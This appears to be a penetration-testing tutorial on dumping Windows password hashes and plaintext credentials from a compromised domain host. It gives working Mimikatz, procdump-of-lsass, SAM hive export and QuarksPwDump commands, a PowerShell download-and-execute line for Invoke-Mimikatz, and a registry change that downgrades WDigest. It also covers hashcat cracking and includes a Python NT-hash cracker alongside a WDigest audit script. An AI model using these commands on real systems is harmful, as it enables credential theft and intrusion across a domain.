Intranet Lateral Movement: Obtaining a Domain’s Single-Server Password and Hash

Lateral movement
In intranet penetration, once an attacker controls one machine on the internal network, that host becomes a springboard: credentials collected on it (and later elsewhere in the domain) are reused to reach other machines and widen the set of assets under control. Repeated often enough, this leads to the domain controller and, in a Windows domain, to control over every machine joined to it.

Many lateral-movement techniques require the attacker to first hold a domain user's password or password hash, for example pass-the-hash, the various pass-the-ticket variants, and golden tickets used to keep access. This article covers that first step, obtaining passwords and hashes from a single compromised host in the domain; the next article covers the attacks themselves.

Password in Windows
Windows does not store local account passwords in plaintext; it stores hashes of them in the SAM database (%SystemRoot%\System32\config\SAM), encrypted with a boot key kept in the SYSTEM hive. Two hash formats exist: the legacy LAN Manager (LM) hash and the NT hash, commonly called the NTLM hash. A hash is a one-way function, not encryption: input of any length maps to a fixed-length output that cannot be reversed, which is why attackers recover passwords by guessing candidates and comparing hashes. The NT hash is MD4 over the UTF-16LE encoding of the password, with no salt, so the same password always gives the same hash on every machine. The LM hash uppercases the password, pads it to 14 characters, splits it into two 7-character halves and uses each half as a DES key, which is why it is trivially cracked.

A Windows password record therefore has two parts, the LM hash and the NT hash. In pwdump-style output the record looks like this (username, RID, LM hash, NT hash):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Because the LM hash is so easy to crack, Windows has stopped storing it by default since Windows Vista and Windows Server 2008 (on older systems it is only omitted for passwords longer than 14 characters or when the NoLMHash policy is set). The value aad3b435b51404eeaad3b435b51404ee in the first field is the LM hash of an empty string and means "no LM hash stored"; the NT hash in the second field is then the only real hash of the user's password. (31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so the record above describes an account with a blank password.)

In a penetration test the hashes of all users can be read from the SAM database on a workstation or member server, and from NTDS.dit on a domain controller (in a domain, account information is stored in NTDS.dit, so it holds the hashes of every domain user). Alternatively, Mimikatz can read the memory of the lsass.exe process to obtain the NT hashes, and in some configurations the plaintext passwords, of users who are currently logged on.

Obtain plaintext password or password hash
Once a hash is obtained, it can either be cracked with a password-cracking tool to recover the plaintext, or used directly in a pass-the-hash (PTH) attack to move laterally.

PwDump7 tool
Download link:

Pwdump7 dumps the password hashes (LM and NTLM) of local users from the command line. It reads the SAM and SYSTEM hives directly from disk, so SYSTEM privileges are required. Old-school hackers will remember this tool. The hashes it prints can be fed to tools such as ophcrack to recover the plaintext password, which helps further penetration.

Usage is simple: run Pwdump7 in a command prompt and it prints the password hashes (LM and NTLM) of every local account on the system:

Mimikatz tools
Download link:

Mimikatz is a powerful and lightweight tool written by the French researcher Benjamin Delpy (gentilkiwi). It is famous in penetration testing because it can pull plaintext passwords straight out of Windows. It can raise the privileges of its own process, inject into other processes and read their memory, but its best-known feature is extracting the credentials of logged-on users from the lsass.exe process. LSASS (Local Security Authority Subsystem Service) enforces the local security policy and handles logons. When a user logs on, the wdigest and tspkg authentication packages kept a copy of the password in LSASS memory, protected with reversible encryption because LSASS needs the plaintext again to answer later authentication challenges; Mimikatz reverses that protection and prints the plaintext. In other words, as long as the machine has not been rebooted, the passwords of users who have logged on since boot can be recovered, but only those users, not every account on the system.

Note: on Windows 8.1, Windows Server 2012 R2 and later, and on older systems where update KB2871997 is installed and the registry value UseLogonCredential is set to 0, WDigest no longer keeps the plaintext password in memory, so Mimikatz only obtains the NT hash (which is still enough for pass-the-hash). The plaintext can still be captured after switching the registry value back on, as described under "Related precautions" below.

Mimikatz is the most common way to read plaintext passwords and hashes. Administrator rights are required (specifically SeDebugPrivilege, which local administrators hold by default):

privilege::debug      // Elevate to debug permissions
sekurlsa::logonpasswords       // Get password

Procdump is a Sysinternals tool signed and distributed by Microsoft, so traditional antivirus usually does not flag the binary the way it flags Mimikatz (modern EDR does alert on any process opening lsass.exe with read access, signed or not). It can be used to dump the memory of lsass.exe to a file. Download link:

First upload Procdump to the target machine and dump the lsass.exe process to a file:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

Copy the resulting lsass.dmp to your own machine and load it into Mimikatz to extract the passwords and hashes. The Mimikatz build must match the architecture (x64 or x86) of the dumped process, and it should be a version that understands the Windows build the dump came from:

sekurlsa::minidump Directory\lsass.dmp       // Load the exported lsass.dmp into mimikatz
sekurlsa::logonpasswords full                 // Get password

Grab password and hash through SAM and System files
First export the SAM and SYSTEM hives of the target with the reg command (the SYSTEM hive holds the boot key needed to decrypt the SAM). Administrator rights are required:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

Then copy sam.hive and system.hive to your own machine and have Mimikatz read the two files to obtain the NTLM hashes:

lsadump::sam /sam:sam.hive /system:system.hive

Mimikatz can also read the live SAM directly on the target. This needs SYSTEM rather than plain administrator rights, which Mimikatz obtains by impersonating a SYSTEM token:

privilege::debug      // Acquire SeDebugPrivilege
token::elevate        // Impersonate a SYSTEM token
lsadump::sam          // Dump the local SAM hashes
Quarks PwDump tool
Download link:

Quarks PwDump is an open-source Windows credential extraction tool that can dump several kinds of credentials: local account hashes, domain account hashes (from an NTDS.dit file), cached domain logon credentials, and BitLocker recovery information. It supports Windows XP/2003/Vista/7/8 and is quite stable.

Use requires administrator rights:

QuarksPwDump.exe --dump-hash-local        // Export local account hashes
QuarksPwDump.exe -dhl                     // Same, short form

QuarksPwDump.exe -dhdc                    // Export cached domain logon credentials (DCC/mscash) from the local machine
QuarksPwDump.exe --dump-hash-domain-cached   // Same, long form

Use Powershell script
The Invoke-Mimikatz PowerShell script loads Mimikatz reflectively into memory and runs it. The script is part of the PowerSploit post-exploitation framework. Download address:

The passwords can be obtained by downloading and executing the script in memory on the target, or by importing a local copy. Administrator privileges are required either way. Note that the script is heavily signatured, so Windows Defender and AMSI will usually block it unless it is modified.

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"

powershell -exec bypass -c "& {Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCreds}"

Windows password hash cracking method
Ophcrack online cracking
Once a hash is obtained it must be cracked to recover the plaintext password. Several websites offer online lookup of NT hashes against precomputed tables: paste the hash and the site returns the password if it is in its tables.


Enter the NTLM hash in the first query box and click GO. Passwords shorter than 14 characters and made of characters covered by the site's tables are usually recovered within minutes; passwords outside the tables' length or character set are not found at all:

ophcrack tool
ophcrack is a Windows password hash cracker based on rainbow tables; the project provides tables of several tens of GB for download.

ophcrack download link:

The download link of the rainbow table provided by ophcrack:

Ophcrack is simple to use: open the program, click Load to import the hashes, load the rainbow tables under Tables, and click Crack:

For details on ophcrack see: Ophcrack and rainbow table


Hashcat tool
Hashcat is widely regarded as the fastest password cracker available and describes itself as the first and only GPGPU-based rule engine.

Download link for Windows:

Linux version download address:

If you download the source, run "make && make install" in the source directory to build and install it (prebuilt binaries are also provided and are usually the easier option).

Execute “hashcat -h” to enter the help page:

(1) -m specifies the hash value type

For example, we often use

-m 1000: NTLM
-m 5600: Net-NTLMv2
-m 5500: NetNTLMv1 / NetNTLMv1+ESS
-m 0: MD5
-m 2500: WPA/PSK (deprecated in hashcat 6.x in favour of -m 22000)
For more hash types, please see the official website:

(2) -a specifies the crack mode

-a 0: dictionary mode
-a 1: Combination mode
-a 3: Mask brute force cracking
The rules directory contains rule files that mutate every dictionary word (case changes, appended digits and symbols, and so on); they are applied with -r, for example -r rules/best64.rule. Keep what you know about the target (names, company, year) in a small base.txt wordlist in the current directory and let the rules expand it.

Place the prepared dictionary passwords.txt and the file of hashes to crack, hash.txt, in the directory where hashcat is located:

./hashcat -m <type> -a 0 <hashfile> <passwords.list1> <passwords.list2>
./hashcat -m 1000 -a 0 hash.txt -o result.txt passwords.txt
./hashcat -m 1000 -a 0 <NTLM hash> passwords.txt          // a single hash can be given in place of the file

-a 0: Use dictionary (straight) mode.

-m <type>: The type of hash in the hash file (1000 for NTLM).

-o: Write cracked results to the given file (by default they go to the potfile and the screen).

<hashfile>: A file with one hash per line, all of the same type.

<passwords.list>: The dictionary file(s); several can be given.

Hashcat can do far more than this; the modes above only scratch the surface and are worth exploring further.
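To make the two ideas above concrete, the NT hash format from the "Password in Windows" section and what "hashcat -m 1000 -a 0" with a rule file actually does, here is an added Python example that is not part of the original article or of hashcat. It implements MD4 in pure Python (hashlib's md4 is frequently unavailable on OpenSSL 3 builds), derives NT hashes from it, parses pwdump-format records, and runs a miniature dictionary attack with a few hand-written mutation rules standing in for a hashcat rule file. The sample records, wordlist and rules are constructed for the example; the hash values of "" and "password" are the well-known real ones.

```python
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty string: "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"                 # padding: 0x80, zeros, 64-bit bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    rounds = (   # (function, additive constant, shift amounts, message-word order)
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c             # rotate registers so the next step updates old d
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """Parse one pwdump-format record: user:RID:LM hash:NT hash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    lm, nt = lm.lower(), nt.lower()
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM,          # a real LM hash: legacy system or NoLMHash disabled
            "blank_password": nt == EMPTY_NT}


def dictionary_attack(entries, wordlist, rules=()):
    """Miniature `hashcat -m 1000 -a 0 hash.txt wordlist -r rules`: hash each word and each
    rule-mutated word once, then look the result up against every target. NT hashes are
    unsalted, so one candidate hash is checked against all users at no extra cost."""
    targets = {}
    for e in entries:
        targets.setdefault(e["nt"], []).append(e["user"])
    cracked = {}
    for word in wordlist:
        for cand in {word, *(rule(word) for rule in rules)}:
            for user in targets.get(nt_hash(cand), ()):
                cracked.setdefault(user, cand)
    return cracked


# Constructed sample records in pwdump format; not taken from any real system.
SAMPLE_DUMP = [
    f"Administrator:500:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",   # NT hash of "password"
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",                                 # blank password
    f"svc_backup:1001:{EMPTY_LM}:{nt_hash('Summer2023!')}:::",
    f"jdoe:1002:{EMPTY_LM}:{nt_hash('x7#Qp!vL9zRw')}:::",                  # not in the wordlist
]
WORDLIST = ["password", "summer2023", "welcome1"]                          # stands in for passwords.txt
RULES = (str.capitalize, lambda w: w + "!", lambda w: w.capitalize() + "!")  # stands in for -r rules

if __name__ == "__main__":
    entries = [parse_pwdump_line(line) for line in SAMPLE_DUMP]
    for e in entries:
        print(f"{e['user']:<14} rid={e['rid']:<5} lm_stored={e['lm_stored']} blank={e['blank_password']}")
    print("cracked:", dictionary_attack(entries, WORDLIST, RULES))
```

Running the script flags the Guest account's blank password before any cracking starts, recovers "password" for Administrator and "Summer2023!" for svc_backup through the capitalize-and-append rule, and leaves jdoe uncracked, which is the same outcome hashcat would give with an equivalent wordlist and rule file. The point worth noticing is in dictionary_attack: because the NT hash has no salt, the cost of the attack grows with the number of candidates, not with the number of users, which is why a dump of a whole domain is cracked almost as cheaply as a single hash.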

Related precautions
To stop plaintext passwords being kept in memory, Microsoft released update KB2871997 (for Windows 7, Windows 8, Windows Server 2008 R2 and Windows Server 2012), which adds the UseLogonCredential registry value for the WDigest provider. Windows 8.1, Windows Server 2012 R2 and later versions do not cache WDigest credentials by default, so an attacker cannot read plaintext passwords from memory on them. On the older versions the plaintext stops being cached once KB2871997 is installed and UseLogonCredential is set to 0.

WDigest caching can be turned on or off from the command line with the reg add command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f           // turn on WDigest caching (weak setting)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f           // turn off WDigest caching (hardened setting)

Attack method: set UseLogonCredential to 1, then log the current user off (or wait for the next logon). After the user logs on again, Mimikatz can export the plaintext password. Defensively, that registry write is a high-value detection: a change of UseLogonCredential to 1 has no legitimate reason on a modern host and should be alerted on.

The Invoke-MimikatzWDigestDowngrade script in Nishang integrates this function, the address is as follows:
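As an added example for the audit side of this setting (not part of the original article or of Nishang), the Python below reads UseLogonCredential from the live registry on a Windows host and decides whether WDigest plaintext caching is in effect. The decision function is separate from the registry read so it can be checked offline. It assumes the rules stated in this section: an explicit 1 enables caching and an explicit 0 disables it on any version, and when the value is absent, Windows 8.1 / Server 2012 R2 (build 9600) and later default to off while older builds default to on, which is why Microsoft's guidance for those builds is to set the value to 0 explicitly after installing KB2871997.

```python
import sys

WDIGEST_KEY = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
WIN81_2012R2_BUILD = 9600   # first build family that stops caching WDigest credentials by default


def wdigest_caching_enabled(use_logon_credential, windows_build: int) -> bool:
    """Does LSASS keep a reversible copy of logon passwords for WDigest?

    - Value present: 1 means caching on, 0 means off, whatever the Windows version.
    - Value absent: build 9600 (Windows 8.1 / Server 2012 R2) and later default to off;
      older builds default to on, so the hardened state there requires an explicit 0
      (assumption taken from Microsoft's KB2871997 guidance, see lead-in).
    """
    if use_logon_credential is not None:
        return int(use_logon_credential) != 0
    return windows_build < WIN81_2012R2_BUILD


def audit_local_machine():
    """Read the live value on a Windows host.

    Returns (value or None, build, caching_enabled), or None when not on Windows."""
    try:
        import winreg
    except ImportError:                 # not Windows: nothing to read
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WDIGEST_KEY) as key:
            value, _ = winreg.QueryValueEx(key, "UseLogonCredential")
    except FileNotFoundError:           # key or value missing: the OS default applies
        value = None
    build = sys.getwindowsversion().build
    return value, build, wdigest_caching_enabled(value, build)


if __name__ == "__main__":
    result = audit_local_machine()
    if result is None:
        print("not Windows; nothing to audit")
    else:
        value, build, enabled = result
        state = "ENABLED (plaintext recoverable with Mimikatz)" if enabled else "disabled"
        print(f"build {build}, UseLogonCredential={value!r}: WDigest caching {state}")
```

On a hardened Windows 7 host the expected output is an explicit 0; on Server 2012 R2 or later an absent value is fine, and a value of 1 anywhere is the downgrade described above and should be treated as an indicator of compromise.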

In this section we covered how to obtain passwords and hashes from a single host in the domain during intranet penetration. Once a hash is obtained it can be brute-forced with the tools above to recover the plaintext, or reused directly in pass-the-hash and pass-the-ticket attacks, both of which are very useful for moving through the intranet.

In the next section we explain intranet lateral movement techniques such as PTH and PTT in detail.

